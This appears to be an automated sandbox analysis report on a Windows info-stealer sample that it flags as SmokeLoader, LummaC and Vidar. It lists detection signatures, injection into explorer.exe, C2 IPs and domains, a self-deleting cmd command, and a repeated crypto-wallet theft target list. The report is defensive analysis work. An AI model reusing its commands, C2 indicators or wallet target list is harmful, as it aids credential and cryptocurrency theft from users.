Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: 21AE.exe, 00000005.00000002.2691719782.00000000007E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpn
Source: JEBKEH.13.dr Binary or memory string: discord.comVMware20,11696428655f
Source: JEBKEH.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW+<
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: JEBKEH.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: JEBKEH.13.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: JEBKEH.13.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: JEBKEH.13.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: JEBKEH.13.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: JEBKEH.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: JEBKEH.13.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: JEBKEH.13.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: JEBKEH.13.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: JEBKEH.13.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: JEBKEH.13.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: JEBKEH.13.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh System information queried: CodeIntegrityInformation
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_007C32E7 rdtsc 5_2_007C32E7
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00402A9F LdrLoadDll, 0_2_00402A9F
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CACAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_6CACAC62
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_007BE06B push dword ptr fs:[00000030h] 5_2_007BE06B
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0214092B mov eax, dword ptr fs:[00000030h] 5_2_0214092B
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02140D90 mov eax, dword ptr fs:[00000030h] 5_2_02140D90
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CACAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_6CACAC62

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: C9A7.exe.2.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 187.143.58.5 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 186.112.12.192 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80 Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory allocated: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 12_2_042DA4F0
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Thread created: C:\Windows\explorer.exe EIP: 33219E0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Thread created: unknown EIP: 31919E0 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: 21AE.exe String found in binary or memory: zippyfinickysofwps.shop
Source: 21AE.exe String found in binary or memory: obsceneclassyjuwks.shop
Source: 21AE.exe String found in binary or memory: acceptabledcooeprs.shop
Source: 21AE.exe String found in binary or memory: whispedwoodmoodsksl.shop
Source: 21AE.exe String found in binary or memory: boredimperissvieos.shop
Source: 21AE.exe String found in binary or memory: holicisticscrarws.shop
Source: 21AE.exe String found in binary or memory: sweetsquarediaslw.shop
Source: 21AE.exe String found in binary or memory: plaintediousidowsko.shop
Source: 21AE.exe String found in binary or memory: miniaturefinerninewjs.shop
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section unmapped: C:\Users\user\AppData\Local\Temp\katA304.tmp base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 422000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 42E000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 641000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Process created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CB14760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 13_2_6CB14760
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 13_2_6C9F1C30
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2037854889.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2036595437.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CACAE71 cpuid 13_2_6CACAE71
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CACA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 13_2_6CACA8DC
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA18390 NSS_GetVersion, 13_2_6CA18390
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: 21AE.exe, 00000005.00000002.2691748524.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.000000000081F000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000978000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\21AE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected CryptOne packer
Source: Yara match File source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000818000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
